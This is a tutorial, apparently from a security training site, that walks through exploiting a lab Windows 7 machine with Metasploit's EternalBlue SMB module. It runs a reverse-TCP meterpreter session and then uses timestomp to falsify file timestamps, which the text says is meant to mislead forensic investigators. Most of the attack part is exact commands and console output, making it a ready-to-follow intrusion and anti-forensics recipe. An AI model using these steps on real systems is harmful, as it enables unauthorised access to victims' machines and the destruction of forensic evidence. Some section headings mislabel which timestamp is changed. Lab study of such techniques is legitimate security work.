Metasploit can used in various ways for exploiting Windows vulnerabilities. Metasploit, most popular framework for pentester/ security researcher, is capable for attacking any Windows operating system platform. Metasploit gives multiple exploit and modules to test & exploit Windows.
We will show timestomp module in metasploit, in which attacker can change file attributes of any file in Windows machine. File attributes are the metadata associated with files in Windows. Metadata shows the File Create, Modification & write date & time. According to ethical hacking researcher of international institute of cyber security, metasploit has really helped security community in day to day work.
MACE Values
MACE (modified, accessed, created) are recognized as file attributes. It shows the date and time of any file in Windows machines. File attributes are mostly examined by IT administrators for cyber forensics investigations. We will show how timestomp module can be used to change the file attributes of any file in Windows Operating System.
- We will use two operating system. On attacker side we will use Kali Linux 2018.4 amd64.
- And on Victim side we will use Windows 7 Build 7600 64 Bit with Windows Firewall and defender disabled.
- Open terminal in Kali Linux.
- Type msfconsole, so for testing timestomp we will use SMB (Service Message Block) exploit for attacking victim machine. SMB is used in different scenarios like – printer sharing, accessing Windows Remote Services and other services which are associated with SMB.
root@kali:/home/iicybersecurity/Downloads# msfconsole
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v4.17.17-dev ]
+ -- --=[ 1817 exploits - 1031 auxiliary - 315 post ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > options
- Type set RHOST 192.168.1.6 – Victim IP Address
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.6
RHOST => 192.168.1.6
msf exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.6 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
- Type run
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.4:4444 -> 192.168.1.6:58238) at 2020-01-17 23:50:10 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\iics\Desktop\iicybersecurity
cd C:\Users\iics\Desktop\iicybersecurity
C:\Users\iics\Desktop\iicybersecurity>
C:\Users\iics\Desktop\iicybersecurity>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9E30-BB33
Directory of C:\Users\iics\Desktop\iicybersecurity
01/18/2020 10:18 AM <DIR> .
01/18/2020 10:18 AM <DIR> ..
01/18/2020 10:19 AM 172 iicybersecurity.rar
01/18/2020 10:18 AM 21 iicybersecurity.txt
01/18/2020 10:18 AM 19 testfile.txt
3 File(s) 212 bytes
2 Dir(s) 40,536,866,816 bytes free
- While attacking with metasploit, sometime shell doesn’t respond properly. For solving this issue. Type exit then press enter.
- Type y
C:\Windows\system32>exit
exit
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run the commands stored in a file
shell Spawn an interactive shell (*NIX Only)
download Download files (*NIX Only)
upload Upload files (*NIX Only)
background
Background session 7? [y/N] y
msf exploit(windows/smb/ms17_010_eternalblue) >
- Here, attacker might need set meterpreter shell. For that type set payload windows/x64/meterpreter/reverse_tcp
- Type exploit, this will create meterpreter session to victim machine.
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) >
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.6
[*] Meterpreter session 8 opened (192.168.1.4:4444 -> 192.168.1.6:55800) at 2020-01-18 00:33:38 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
meterpreter >
- Type timestomp help
meterpreter > timestomp help
Usage: timestomp <file(s)> OPTIONS
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
- Type ls and type cd iicybesecurity
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2019-08-23 01:33:26 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:34 -0500 Program Files
40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:04 -0500 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2019-12-17 05:43:04 -0500 ProgramData
Clean.rar
40777/rwxrwxrwx 4096 dir 2020-01-16 06:37:21 -0500 System Volume Information
40555/r-xr-xr-x 4096 dir 2019-08-23 01:33:18 -0400 Users
40777/rwxrwxrwx 16384 dir 2020-01-18 00:38:27 -0500 Windows
40777/rwxrwxrwx 0 dir 2020-01-17 23:48:58 -0500 iicybersecurity
0000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
meterpreter >
meterpreter >
meterpreter > cd iicybersecurity
meterpreter >
meterpreter > ls
Listing: C:\iicybersecurity
===========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 172 fil 2020-01-17 23:49:00 -0500 iicybersecurity.rar
100666/rw-rw-rw- 21 fil 2020-01-17 23:48:31 -0500 iicybersecurity.txt
100666/rw-rw-rw- 19 fil 2020-01-17 23:48:44 -0500 testfile.txt
- Type timestomp iicybersecurity.txt -v this command will show the details of the file with its file attributes.
- -v will display the UTC MACE values of the file, which is around 2020-01-17 23:48:XX.
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.txt
Modified : 2020-01-17 23:48:31 -0500
Accessed : 2020-01-17 23:47:38 -0500
Created : 2020-01-17 23:47:38 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
meterpreter >
- From here attacker will change files attributes to confuse IT administrators that none of the files has accessed. As first step followed by IT Admins is always to check the file attributes. In such cases, Digital Forensics courses offered by International Institute of Cyber Security helps IT Administrator understand the procedure to do forensics in case of any such hacking activity.
Changing Accessed Time of File
- For changing file attributes type
meterpreter >
meterpreter > timestomp iicybersecurity.rar -a "02/11/2008 08:34:08"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
- Type timestomp iicybersecurity.rar -v This will change the accessed time of file to 2008-02-11 08:34:08.
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2020-01-17 23:48:58 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
Changing Last Accessed Time
- Type timestomp iicybersecurity.rar -c “02/11/2000 08:34:10”
- Type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -c "02/11/2000 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2000-02-11 08:34:10 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
- Above shows the creation time of file has changed.
Modifying the Existing Files
- Type timestomp iicybersecurity.rar -e “02/05/2014 08:34:10”
- Then type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -e "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2020-01-17 23:49:00 -0500
Accessed : 2008-02-11 08:34:08 -0500
Created : 2000-02-11 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500
Changing All File Attributes
- Type timestomp iicybersecurity.rar -z “02/05/2014 08:34:10”
- Then type timestomp iicybersecurity.rar -v
meterpreter > timestomp iicybersecurity.rar -z "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified : 2014-02-05 08:34:10 -0500
Accessed : 2014-02-05 08:34:10 -0500
Created : 2014-02-05 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500
meterpreter >
- Above shows that all file attributes has changed.
Cyber Security Researcher. Information security specialist, currently working as risk infrastructure specialist & investigator. He is a cyber-security researcher with over 25 years of experience. He has served with the Intelligence Agency as a Senior Intelligence Officer. He has also worked with Google and Citrix in development of cyber security solutions. He has aided the government and many federal agencies in thwarting many cyber crimes. He has been writing for us in his free time since last 5 years.
